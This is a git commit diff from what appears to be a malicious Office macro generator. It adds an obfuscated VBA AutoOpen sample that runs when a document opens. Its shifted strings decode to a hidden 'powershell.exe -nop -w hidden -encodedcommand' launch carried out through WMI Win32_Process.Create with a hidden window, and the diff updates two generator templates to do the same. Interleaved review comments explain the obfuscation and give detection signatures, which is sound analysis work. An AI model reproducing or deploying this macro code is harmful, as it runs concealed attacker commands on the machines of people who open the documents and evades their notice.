Updated WMI to hide window
parent
e2ee427a3b
commit
71cc07b2ec
|
@ -0,0 +1,135 @@
|
|||
|
||||
|
||||
|
||||
|
||||
|
||||
Sub AutoOpen()
|
||||
Dim qrMsPEfZZxQtuT As String
|
||||
Dim uqESZvZWU As Object
|
||||
Dim YcCVBPFAXEgRZJKMArhrq As Integer
|
||||
Dim ilttqSzePLIB As String
|
||||
Dim PSxgNvQbzD as String
|
||||
|
||||
YcCVBPFAXEgRZJKMArhrq = 6438
|
||||
PSxgNvQbzD = CALGUwZkIjKgysDPyM("BpYPdusgPtDSBdRIRfluMvJ")
|
||||
Set uqESZvZWU = GetObject(PSxgNvQbzD)
|
||||
ilttqSzePLIB = CZExVbvjSNaN("BpYPdusgPtDSBdRIRfluMvJ")
|
||||
ilttqSzePLIB = XItmeSMLzMDoEt(uqESZvZWU, ilttqSzePLIB, YcCVBPFAXEgRZJKMArhrq)
|
||||
End Sub
|
||||
|
||||
Function CZExVbvjSNaN(wCqKU As String) As String
|
||||
Dim gcGCwobmOwetmyCIXerNTAZ As String
|
||||
Dim yntZzVvZZccetYiLF As String
|
||||
Dim wzfXnd As String
|
||||
wzfXnd = "fpg1h{h#2f#srzhuvkhoo1h{h#0qrs#0z#klgghq#0hqfrghgfrppdqg#MDE}DG3DWjEoDKfDOTESDJLDdjEoDJPDgDDjDHnDWzDxDH3D]TEwDJ;DfjE8DIPDgDE|DJXD\TEwDFjDODEeDHPDezExDK\D]TE|DKTD[TD9DGrDUjE|DJ;DeTEFDJHDfzEoDG\DQDEWDKT"
|
||||
Dim mnZGckHXWkbNuHfHEs As String
|
||||
mnZGckHXWkbNuHfHEs = "DfjEsDJ7D]zDrDFLDVDD3DKPDVTEEDHHDTTEEDHHDTTEEDHHDTTEPDGHDZDEkDIfDOzElDH;DTjETDFvDVDETDGjDVzE]DILDUjEEDHXDgTE|DGTD\jEzDJ;DYTEGDH\DUDEODKTDNzE}DKLDeDEsDGHD]jEkDKjDdTDzDIPDWTE3DH3DVzERDHfDYjEODHTDgjESDKT"
|
||||
Dim EudNeKPlPnTvhZmQa As String
|
||||
EudNeKPlPnTvhZmQa = "DgjD8DGnDXjD4DHzD]DE4DKDDgDDzDGPDhDEUDHzDgjEEDHnDUTEYDH;DYDEQDJPDWzEkDIrDYTE8DJHDYjEZDG\D\jDzDJ3DXzDzDGfD]zEvDHTDeDE8DKHDVjDuDKfDVTEWDJ7DUjEJDHvDfDE8DGTDfDEyDIPDgTEZDH;DNzEkDIPDeTD{DKHDUjExDKnDPjEqDGf"
|
||||
Dim WTksSoRlwX As String
|
||||
WTksSoRlwX = "DYzEsDKfD]DEODKDD]DElDIjDRTErDHzDYDEMDJjDXDEqDGDDUDD4DHvDPzE\DILDhDE9DGXDPjEJDJXDPTE8DJjDOzD|DJzDVzDzDJrDVTEkDI\DfTENDIDDhTENDHPDXzEuDHvD]jD5DJjD\zE\DKHDZTE3DGTDVzDyDIHDTzE5DHvDZjEPDHTDPDE4DGLDezDzDKX"
|
||||
Dim XOKupOohTiUtGeW As String
|
||||
XOKupOohTiUtGeW = "DZDE8DJ;DPDEqDHHDYjE8DJvDhjEnDH\DPjE[DKjDUTE4DIrDgDD6DJnDQDD7DJTDhTD5DIDDgjEYDJvDRDEvDGPDfDEuDGTDeDEGDJfDWDE{DKLDdjEsDJrD]zEkDInDfjE\DGXDZDE7DJjDgjE|DGDDfTE|DJTDQjEyDHzDZjEYDF;DeDEMDKXDeDD4DJvDQjEJDKn"
|
||||
Dim ZJdTS As String
|
||||
ZJdTS = "DgjEQDJrDPjEWDHjDWTE|DInDPzE]DHLDUDE8DIPDVDEXDIfDUjEtDJHDWzEPDH3DdTE]DIfDRDD5DJvDfDE5DGfDQTEzDG\DfjETDKLDOzEODHzDYDETDI\DWDEsDHjDeTEqDKHD]TE]DJjDdzERDITDWjEIDH3DQTEZDIjD]jEwDJ3DXjE7DJPDWzEHDGHDgTE{DKH"
|
||||
Dim VSGtpb As String
|
||||
VSGtpb = "DXjD{DJ3DNzE8DHnDXTEkDGXDdzEdDH3DQjD8DInDhTEMDKjDdTD6DJLDgTE7DGjDfDD{DHXD]DD{DI\DXDEqDIfDPDDuDJzD\TELDK\DVzElDGjDPjEQDIrDVzEdDJPDUzEqDKHDWDETDKXDTTEHDHXDezEUDI\DXDEZDH3DPDD8DKXDVjEVDG\DfDEnDJXDdTELDJ7"
|
||||
Dim toAFlzFGwBIhanWofu As String
|
||||
toAFlzFGwBIhanWofu = "D\TEoDIfDYDERDJrDRDE{DH7DTTEqDGnDhTEZDKfDVzD4DGXDWDD5DInDeTE3DIPD]jD7DJTDfzEKDJ3DXTEkDGLDTzESDJPDUDE4DJjDQjEyDIjDZDEzDF;DezEXDHTDYzD4DJ3DPDEmDKnD\TEqDG\DdzE3DJ\DYDE7DF;D]DD8DKjD\jEnDH;DQzEKDHzDUTD}DHf"
|
||||
Dim FYCKEzBdOtzBx As String
|
||||
FYCKEzBdOtzBx = "DfTDyDJzDWDD6DKPDhjEtDIHDQDE\DJvDXjEGDGPDfjE{DIfDNzE{DI\DfTEGDHvDYTEYDKfD]DEPDKXDfDEUDHHDOzEZDJzDZTEzDIPDQDE4DGXDgjEKDIPD]zEtDGHD\TE\DKfDXTE}DGXDfjE3DITD\zEwDJ3DeDEEDGDDfDEqDHvD]jE6DHTD]jEJDGTDWzDyDIr"
|
||||
Dim lObUCjU As String
|
||||
lObUCjU = "DUDE{DHPDPjEYDJXDgTE[DG\DNzE[DHLDhTE5DIDDZDEIDHfDQjEZDGjDVzE8DKDDNzD3DJrDdjE8DHrDWTE7DH3DRTD6DKDDXzD4DHrDXjErDIrDfDEGDGXDdTETDGjD]jExDGDD\zEJDKnDUjEXDHrDWzE{DHLDRDEVDF;DUDEzDKnDVzD}DITDWjETDH\DezD4DJX"
|
||||
Dim mxATuPixshP As String
|
||||
mxATuPixshP = "DWjErDJzDRTEsDJvDQDE3DJTD]TEmDILDgDEoDJPDhDEyDHLDdzEXDJ3DXjEnDIXDUjEVDITDdjE6DJXDYTEZDHnDQzE6DKHDTjEKDJnDRDD4DJTDfzEZDIrD]jENDGfDQzE7DHfDezErDKnDhTE6DJ\DUTEFDJHDTTEYDKjDezEpDFvDfzEXDH;DVjEIDITDYzD{DG\"
|
||||
Dim rbJHrFGH As String
|
||||
rbJHrFGH = "DVDEoDJ;DTzEqDH3DeTD}DHPDfzD4DJHDXTDzDKLDXTEIDF;DYTE7DHTDXTD5DJ7DPjD5DH7DgjEMDH\DWDEPDHjDTTEnDHLDYzE4DJ3DVDEuDHrDWjD|DIfDdjEIDKDDQTEzDIPDdzEJDJXDXTEJDGfDVDEsDHXDXTEsDJ7DdTEzDJ\DfDEHDGPDYTD6DHnDVjElDH7"
|
||||
Dim oLwCJ As String
|
||||
oLwCJ = "DhDEMDHXDOzEsDH\DgjEyDKLDdzEFDG\DgjEPDJfDfzE5DJvDVDD4DJ;D]zD}DKPDTjErDKHDUzD4DKDDYDElDHTDXDEIDHnDeDE|DITDXTE]DJ;D\zElDHLDZjEQDGXDVjEFDJ\DYjEZDITDWTE{DInD\zDuDInDQTEMDHfDdzELDIDDezEKDJTDTzEEDKTDYDEVDJv"
|
||||
Dim xUdZsFglujHSJ As String
|
||||
xUdZsFglujHSJ = "DVDEtDJvDOzEUDF;DTTDzDITDXDEwDH\DXTD|DGPDXzD|DJ7DWDEvDHTDVDEJDJHDXDEKDKPDXTETDGHDQDEdDJjDXzEmDJLDhDErDJjDhDEPDGHDZDD8DIHDNzENDIXDfTEWDH\DXjEJDIfDVjD4DHTDWzEvDHnDZTEEDH3DWDEwDIHD\TEmDI\DdTE5DJ;DXTEkDKD"
|
||||
Dim BUOFvFtXpWYOxqwsmCr As String
|
||||
BUOFvFtXpWYOxqwsmCr = "DVzEdDJ\DXjERDGXDOzEZDH;DOzExDJvDgjEWDITDejEwDIfD]jELDJrDPjEzDKjD\TEuDGTDWjE6DGTDhTEWDKDDdTE]DGDDezD3DG\DgzEnDGHDPzEQDHfDXDEyDJ\DTTEwDKfDPTE\DKrDdDEKDJrDdTEqDGHDQjE[DJ;DZjE\DJnDWzD8DJvD]TD|DKjDPTEyDHn"
|
||||
Dim SOtEKNXgEZHXFGCxhWp As String
|
||||
SOtEKNXgEZHXFGCxhWp = "DejEwDJ7DYDD3DKjDPzEWDJXDeTEXDGXDQTErDGfD]TEHDKLDgzEtDI\DeTE8DHvDhTEqDJ\DhTE4DJ\DZDEUDKnDVDElDKPD\zE3DHPDgjD{DGLDQDEUDGLDhjE3DGfDNzD5DJHDWDD6DHTDYzD6DKHD\jEYDJ3DXTELDJ\DXDEmDKPDPDElDILDWTE|DKTDNzE6DJH"
|
||||
Dim ZrrulF As String
|
||||
ZrrulF = "DfjD6DILDgTEHDKrDQDEqDInDfzESDJTDWTE[DJTDQTE7DHXDWzEuDF;DRTEODKTDgTE4DGnDfzEQDJrDXDE7DILDYDE}DHrDgjEvDGDDfTERDIPDXTD3DI\DdTD5DI\D]TEQDJ\D]DEMDJHDTzE4DJnD]jDzDIPDdzD5DGfDWDD8DIXDhDE5DIfDYTEJDKTDQzElDIH"
|
||||
Dim TatdI As String
|
||||
TatdI = "DXDD3DJPDdzD{DJXD\jEdDIXDVDE{DGPDUzErDH7DdDE5DKrDXjE|DIrDYTD|DG\DhjELDHnDdjEGDK\DXzE9DH;DTzD5DFvDRDD4DIHDZTE]DJfDTjEVDGXDdTEkDKnDTzEKDHTD]DE}DGHDfzEvDJ7DfjE4DJjDeDEdDIrDZDEVDIjDhDEoDGHDPjEZDIjDOzEkDKT"
|
||||
Dim CiIGaZrrUJq As String
|
||||
CiIGaZrrUJq = "DVjDyDK\DgzDzDGTDZjEsDIfDejErDI\DgDE|DGHDYzEqDG\DXDE[DGjDUjE}DHfDUDErDHTDfTD8DKPD\TEwDHvDdjEYDJ\DdzEEDJ\DeTEtDIfDhTE\DJLDeTEHDHjDXzEvDGLDejEGDHfDOzEnDGfDfDEwDG\D\TEvDGPDWTEIDJHDPjE8DKjDRTExDGTDOzEoDGX"
|
||||
Dim ODsyVBQ As String
|
||||
ODsyVBQ = "DYzEIDInDeDEmDHXDZjE[DKLD\jEyDKHDdzExDHLDYjE5DGnDPzEQDKnDfTEtDInD]TEoDGXDRDEkDH\DZjD4DH;DVDERDK\DQzD5DJXDYDEqDIfD]zDyDH7DWDEoDJ;DgDEzDJ3DWzEpDFvDWjEJDKTD\zEoDJ7D\jENDGXDWTE|DHTDgzEdDGTDWTEzDGLDYDETDHX"
|
||||
Dim TCUdXv As String
|
||||
TCUdXv = "DQjEwDG\D]jE4DH3DWDENDJnDOzERDKjDezE6DIrDPTEpDIXDWDD3DGLDgzESDGPDTTEEDHzDgTEKDJ;DOzEzDJ3DgzEwDJLDZjEoDK\DZjD|DGPDWjE{DF;DdzD8DJ\DdjE]DJPDWTEmDKXDXTD6DKHD]jEGDJzDZDEVDGfDhDEvDJrDfTE9DIfDXDEoDGXDVjE{DF;"
|
||||
Dim KMoGxtpQUro As String
|
||||
KMoGxtpQUro = "DPjE6DKnDNzEkDJ7DZDErDGDDPzDzDITDWjEGDGXDYjEkDKDDWDE{DKHDdjE4DJzDdDElDGfDdTE]DF;DPjEJDGTDUDDyDFvDdDDzDGfDhDEsDIjD\zDyDI\DQjEMDG\DVzEpDHnDUjENDGHDejE|DHvDeDEWDInDUTEqDKPDOzE[DH;DTjEsDGPDRDD|DJHDNzEZDJX"
|
||||
Dim rocwFyWRtPwPRPha As String
|
||||
rocwFyWRtPwPRPha = "DUDEKDIPDZjEoDHTDfTEkDHTDWTEFDIjDNzEkDHjDdjEkDKjDYjEIDHnDPjEVDH7D\jE5DHjD\jEXDHnDfDEMDJXDTjEnDGPD\TEHDGLDVDE{DHfD]TEXDJ\DVjEKDGDDQTE3DJXDeDD7DILDYDD8DJzDPTEqDIjD]TEmDGjDQDEkDKnDhjD|DJXDhjErDGXDejEuDGD"
|
||||
Dim hPgycfYYOoBWU As String
|
||||
hPgycfYYOoBWU = "DVTEVDKXDgzEUDJTDhTDzDKjDRDE9DJHDZjEWDGPDRDEkDHHD]zEIDI\DfTEKDG\D]zD{DHHDYjEMDJHDgTE6DJ3DYzD4DKLD]jEUDG\DPjEHDIXD]jD4DIjDgTE3DGnDejEqDJjDYTErDK\DWjEkDJTDQDE8DH7DhjD|DH7DUzD|DGTDeTESDJ7DYTEPDJLDPjEHDJP"
|
||||
Dim XeZIz As String
|
||||
XeZIz = "DfTEKDGnDgjEMDK\DQzEmDJXDVzE3DJTDUzEIDIPDQjD3DHjDYTD6DHLDYjD6DH7DXjEsDG\DRTEmDKnDRDE[DITDgzE\DIDD\jD6DJXDQTE[DGnDNzEtDKXDUDDzDJnDfDEsDGHDXzEmDHnD\TE3DKfDgjEYDGfDfTDyDK\DRTEyDKXDTjD}DKPDTjE7DK\DWTEMDIj"
|
||||
Dim rNZPTj As String
|
||||
rNZPTj = "D]TEqDJHDZjD3DKHDZDEuDGPDQDE3DIfDXDE|DG\DgzE}DIfD\zE[DJrD\TD5DGTDXDEZDHnDOzEYDGnDhTEwDHjDezEqDHzDVDEuDI\DTzEmDIHDQTD7DHvDWzEwDK\DYTE5DKXDdTEkDH3DUDEuDJzDUDE\DGDDTTD8DHjDWTEKDKnDYzELDJjDPTEzDIPDgjEpDHP"
|
||||
Dim vjBIpylQJaWcNEJuYfT As String
|
||||
vjBIpylQJaWcNEJuYfT = "D]jEYDJ\DVDEpDKnDPDD8DJ\DVDEtDHTDTTE6DGXDUjE{DHPDezEMDHfDYDEkDGHDVDETDJvDVjEzDGHDQzEODKXDZjE8DGDDVDEdDKrDYDD5DIfD\zExDJ7DfTD6DF;DYzE[DKjDXDE[DJrD]jEzDJHDYzEtDKrDejDzDHfDQTEpDJzDUjETDHzDQTEMDITDhTEZDIH"
|
||||
Dim OdDSGBVqnrmBACID As String
|
||||
OdDSGBVqnrmBACID = "D\jDuDIHDUzEkDJjDZDD4DIDDPjERDGnDfjEMDF;DhDD{DJLDNzETDGnDZTDuDGnD]jE9DJzDRTEIDF;DQjD4DGnDUDEvDHnDWDE6DGXDOzD}DK\D]zEnDJTDOzE7DGPDdTEQDJHDZTEWDIfDTTD{DJ;DXTD8DKfDeTEuDKfDhTElDGDDZDE{DHfDVTEFDJ7D\zDuDH;"
|
||||
Dim WNIquUYGkUpecPQbus As String
|
||||
WNIquUYGkUpecPQbus = "DZjEzDKnDVDEGDGHDfzEmDJ7DUzE5DH7DQzEyDJLDhjE{DKfDeDEWDIrDYTEtDFvDeDEYDKPDPjD{DJPDezEdDIHDgzENDGXDdDE6DHvD]DEpDJzDTjE}DGnDeTErDIXDUDEsDIjDPTD4DGnDXzEFDIfDRDEHDJPDXTE3DGDDhjE3DHXDgTE3DHvDfzE9DKDDXjEPDKL"
|
||||
Dim qDnmSyPstQKrJ As String
|
||||
qDnmSyPstQKrJ = "DVDE8DITD\jEuDHPDYTEJDHLDXTEPDH3DTTE5DJfD]TDuDHXDYTEpDGnDYTEuDJrDNzEmDKLDRDEyDJXDYDEMDJvDZjE5DKnDezEHDJHDeDEQDInD]TD5DGnD\TE]DJfDYjD8DJvD\zEMDInDUjEMDJ3DWzErDIXDYDEIDKPDXDEmDGPDZjEQDJPDRTEJDITDVTERDHH"
|
||||
Dim xgLjcClnFUTCUj As String
|
||||
xgLjcClnFUTCUj = "DTTEEDG3DLjDsDFnDRzEMDHXDZDDjDFjDWjEoDKfDOTESDJLDdjEoDJPDgDDjDHnDWzDxDIPDgDE|DJXD\TEwDILD]TEkDJTD]TE|DFjDWjEoDKfDOTESDJLDdjEoDJPDgDDjDHnDWzDxDHPDezEwDKDDfjEoDKPDfzEsDJ;DejDxDHfDhjEsDKDDXzE3DKLD]TEkDJ3"
|
||||
Dim IEgSKWOU As String
|
||||
IEgSKWOU = "DNDDnDKPDODEeDHnDWzDxDHPDezEwDKDDfjEoDKPDfzEsDJ;DejDxDHPDezEwDKDDfjEoDKPDfzEsDJ;DejEQDJ;D]DEoDI3DRjD9DHTD]TEmDJ;DeTEzDKLD]TE}DKPDNTDsDFnDOjEVDJXD\TEnDITDezEIDJ7D]DDrDFnDRzD@"
|
||||
|
||||
gcGCwobmOwetmyCIXerNTAZ = wzfXnd & mnZGckHXWkbNuHfHEs & EudNeKPlPnTvhZmQa & WTksSoRlwX & XOKupOohTiUtGeW & ZJdTS & VSGtpb & toAFlzFGwBIhanWofu & FYCKEzBdOtzBx & lObUCjU & mxATuPixshP & rbJHrFGH & oLwCJ & xUdZsFglujHSJ & BUOFvFtXpWYOxqwsmCr & SOtEKNXgEZHXFGCxhWp & ZrrulF & TatdI & CiIGaZrrUJq & ODsyVBQ & TCUdXv & KMoGxtpQUro & rocwFyWRtPwPRPha & hPgycfYYOoBWU & XeZIz & rNZPTj & vjBIpylQJaWcNEJuYfT & OdDSGBVqnrmBACID & WNIquUYGkUpecPQbus & qDnmSyPstQKrJ & xgLjcClnFUTCUj & IEgSKWOU
|
||||
gcGCwobmOwetmyCIXerNTAZ = IMahev(gcGCwobmOwetmyCIXerNTAZ)
|
||||
CZExVbvjSNaN = gcGCwobmOwetmyCIXerNTAZ
|
||||
End Function
|
||||
|
||||
Function pONpYabIh() As String
|
||||
Dim RoPgdoevhhFCaiNBT As String
|
||||
RoPgdoevhhFCaiNBT = IMahev("zlqpjpwv=urrw2flpy5")
|
||||
pONpYabIh = RoPgdoevhhFCaiNBT
|
||||
End Function
|
||||
|
||||
Function XItmeSMLzMDoEt(DitexWndjefju As Object, AoUcUHL As String, MaqkRfyEkIEOdd As Integer) As String
|
||||
Dim CoGsxQyIbBgiQjA As String
|
||||
Dim ApcjiM As Integer
|
||||
Dim mJkTVsNh As Integer
|
||||
Dim JCSnEYzttQSwVdV As Integer
|
||||
ApcjiM = 8
|
||||
CoGsxQyIbBgiQjA = AoUcUHL
|
||||
If (MaqkRfyEkIEOdd > ApcjiM) Then
|
||||
Set SujUrYCEsfPsr = GetObject(pONpYabIh())
|
||||
Set wugrVNYqPPGxXSamhLnkS = SujUrYCEsfPsr.Get(IMahev("Zlq65bSurfhvvVwduwxs"))
|
||||
Set qNgUfERIEAKODVyxb = wugrVNYqPPGxXSamhLnkS.SpawnInstance_
|
||||
ApcjiM = MaqkRfyEkIEOdd - MaqkRfyEkIEOdd
|
||||
ApcjiM = ApcjiM + 12
|
||||
qNgUfERIEAKODVyxb.ShowWindow = ApcjiM
|
||||
JCSnEYzttQSwVdV = DitexWndjefju.Create(CoGsxQyIbBgiQjA, null, qNgUfERIEAKODVyxb, mJkTVsNh)
|
||||
End If
|
||||
CoGsxQyIbBgiQjA = "hNlKxakwGfktPoqaeyQLcP"
|
||||
XItmeSMLzMDoEt = CoGsxQyIbBgiQjA
|
||||
End Function
|
||||
|
||||
Function CALGUwZkIjKgysDPyM(DlzhqGHNiEuPevnJzPtk As String) As String
|
||||
Dim sPMdZm As String
|
||||
sPMdZm = IMahev("zlqpjpwv=Zlq65bSurfhvv")
|
||||
CALGUwZkIjKgysDPyM = sPMdZm
|
||||
End Function
|
||||
|
||||
|
||||
Function IMahev(xwMbMkcLWXnfGMLtZe As String) As String
|
||||
Dim yPccVGSEMWlIDSPolPnWurpD As Long
|
||||
Dim uXFhTeVPXvr As String
|
||||
Dim mJuCgbCXWnphqwwoRWoNWyzB As Integer
|
||||
mJuCgbCXWnphqwwoRWoNWyzB = 3
|
||||
For yPccVGSEMWlIDSPolPnWurpD = 1 To Len(xwMbMkcLWXnfGMLtZe)
|
||||
uXFhTeVPXvr = uXFhTeVPXvr & Chr(Asc(Mid(xwMbMkcLWXnfGMLtZe, yPccVGSEMWlIDSPolPnWurpD, 1)) - mJuCgbCXWnphqwwoRWoNWyzB)
|
||||
Next yPccVGSEMWlIDSPolPnWurpD
|
||||
IMahev = uXFhTeVPXvr
|
||||
End Function
|
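Review bot: The sample added in this section has no header saying that it appears to be generator output, or what it does when a document carrying it is opened, so an analyst who meets the file outside this repository has to reconstruct that from `AutoOpen`. A leading comment such as `' Generated sample: AutoOpen -> GetObject(WMI moniker) -> Create with a Win32_ProcessStartup instance; string literals are shifted by 3 (see IMahev)` would record what the visible code shows. `IMahev` subtracts 3 from each character code, and the short literals passed to it correspond to the WMI monikers and class name that appear in clear text in the template sections further down this page. For triage, the stable features are the `AutoOpen` entry point, the `GetObject` / `SpawnInstance_` / `Create` call sequence and the `Chr(Asc(Mid(...)) - n)` loop. The identifiers look random and presumably change per build, so they make poor signatures.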
File diff suppressed because one or more lines are too long
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,7 +1,7 @@
|
|||
[use:payload_wrapper]
|
||||
[use:exec]
|
||||
[use:init_wmi]
|
||||
|
||||
[use:init_properties]
|
||||
Sub AutoOpen()
|
||||
Dim var1 As String
|
||||
Dim var2 As Object
|
||||
|
@ -27,17 +27,30 @@ Function payload_wrapper(payload_wrapper1 As String) As String
|
|||
payload_wrapper = payload_wrapper2
|
||||
End Function
|
||||
|
||||
Function init_properties() As String
|
||||
Dim init_properties1 As String
|
||||
init_properties1 = decode("{[winmgmts:root/cimv2]}")
|
||||
init_properties = init_properties1
|
||||
End Function
|
||||
|
||||
Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
|
||||
Dim exec4 As String
|
||||
Dim exec5 As Integer
|
||||
exec5 = [smallint1]
|
||||
exec4 = exec2
|
||||
Dim exec4 As String
|
||||
Dim exec5 As Integer
|
||||
Dim exec13 As Integer
|
||||
Dim exec14 As Integer
|
||||
exec5 = [smallint1]
|
||||
exec4 = exec2
|
||||
If (exec3 > exec5) Then
|
||||
exec5 = exec3 - exec3
|
||||
exec1.Create(exec4)
|
||||
End If
|
||||
exec4 = "exec6"
|
||||
exec = exec4
|
||||
Set exec10 = GetObject(init_properties())
|
||||
Set exec11 = exec10.Get(decode("{[Win32_ProcessStartup]}"))
|
||||
Set exec12 = exec11.SpawnInstance_
|
||||
exec5 = exec3 - exec3
|
||||
exec5 = exec5 + 12
|
||||
exec12.ShowWindow = exec5
|
||||
exec14 = exec1.Create(exec4, null, exec12, exec13)
|
||||
End If
|
||||
exec4 = "exec6"
|
||||
exec = exec4
|
||||
End Function
|
||||
|
||||
Function init_wmi(init_wmi1 As String) As String
|
||||
|
|
|
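Review bot: The block added to `exec` assembles the `ShowWindow` value as `exec5 = exec3 - exec3` followed by `exec5 = exec5 + 12`, and nothing says what 12 means. As far as I recall it is outside the values the Win32_ProcessStartup documentation names, so a comment such as `' ShowWindow = 12 (built as exec3 - exec3 + 12): intended to keep the spawned window hidden, per the commit title` is needed. The same block appears in the next file section (hunk `@ -24,14 +25,27 @@`) and the point applies there too. The change does not alter the creation path: the command is still started with `Create` on what is presumably the `winmgmts:Win32_Process` object, so the process is created by the WMI provider host rather than by the Office application. Process-creation logging and the Defender attack surface reduction rule "Block process creations originating from PSExec and WMI commands" therefore still apply regardless of window state, and the comment should say so.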
@ -1,6 +1,7 @@
|
|||
[use:payload_wrapper]
|
||||
[use:exec]
|
||||
[use:init_wmi]
|
||||
[use:init_properties]
|
||||
|
||||
Sub AutoOpen()
|
||||
Dim var1 As String
|
||||
|
@ -24,14 +25,27 @@ Function payload_wrapper(payload_wrapper1 As String) As String
|
|||
payload_wrapper = payload_wrapper2
|
||||
End Function
|
||||
|
||||
Function init_properties() As String
|
||||
Dim init_properties1 As String
|
||||
init_properties1 = decode("{[winmgmts:root/cimv2]}")
|
||||
init_properties = init_properties1
|
||||
End Function
|
||||
|
||||
Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
|
||||
Dim exec4 As String
|
||||
Dim exec5 As Integer
|
||||
Dim exec13 As Integer
|
||||
Dim exec14 As Integer
|
||||
exec5 = [smallint1]
|
||||
exec4 = exec2
|
||||
If (exec3 > exec5) Then
|
||||
Set exec10 = GetObject(init_properties())
|
||||
Set exec11 = exec10.Get(decode("{[Win32_ProcessStartup]}"))
|
||||
Set exec12 = exec11.SpawnInstance_
|
||||
exec5 = exec3 - exec3
|
||||
exec1.Create(exec4)
|
||||
exec5 = exec5 + 12
|
||||
exec12.ShowWindow = exec5
|
||||
exec14 = exec1.Create(exec4, null, exec12, exec13)
|
||||
End If
|
||||
exec4 = "exec6"
|
||||
exec = exec4
|
||||
|
@ -40,5 +54,5 @@ End Function
|
|||
Function init_wmi(init_wmi1 As String) As String
|
||||
Dim init_wmi2 As String
|
||||
init_wmi2 = decode("{[winmgmts:Win32_Process]}")
|
||||
init_wmi = init_wmi2
|
||||
init_wmi = init_wmi2
|
||||
End Function
|
||||
|
|